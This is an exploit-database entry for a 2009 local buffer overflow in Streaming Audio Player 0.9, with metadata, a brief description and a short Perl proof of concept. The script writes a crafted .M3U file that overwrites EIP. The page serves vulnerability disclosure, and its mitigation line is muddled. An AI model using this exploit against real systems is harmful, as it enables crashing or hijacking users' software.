header-logo
Suggest Exploit
vendor:
Streaming Audio Player 0.9
by:
Cyber-Zone (ABDELKHALEK)
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Streaming Audio Player 0.9
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: YES
Related CWE: N/A
CPE: a:streaming_audio_player:streaming_audio_player:0.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Streaming Audio Player 0.9 (.M3U File) Local Buffer Overflow PoC

A buffer overflow vulnerability exists in Streaming Audio Player 0.9 when handling .M3U files. A specially crafted .M3U file can cause a buffer overflow, resulting in arbitrary code execution. This vulnerability is triggered when a user opens a malicious .M3U file with Streaming Audio Player 0.9.

Mitigation:

Upgrade to the latest version of Streaming Audio Player 0.9.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , ZoRLu , ThE g0bL!N , r1z , Mag!c ompo , SimO-s0fT ... All MoroCCaN HaCkerS
#
# FIGUIG OwnZ !!!
#
# Streaming Audio Player 0.9  (.M3U File) Local Buffer Overflow PoC
#
#Olly Registers
#EAX 00197D20
#ECX 0000020E
#EDX 00126F84
#EBX 00193DAF
#ESP 001270B8
#EBP 7C81391C kernel32.GetFullPathNameA
#ESI 00197D20
#EDI 001272D0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EIP 41414141
#
my $Header = "#EXTM3U\n";
my $ex="http://"."A" x 509;
open(MYFILE,'>>buffer.m3u');
print MYFILE $Header.$ex;
close(MYFILE);

# milw0rm.com [2009-05-05]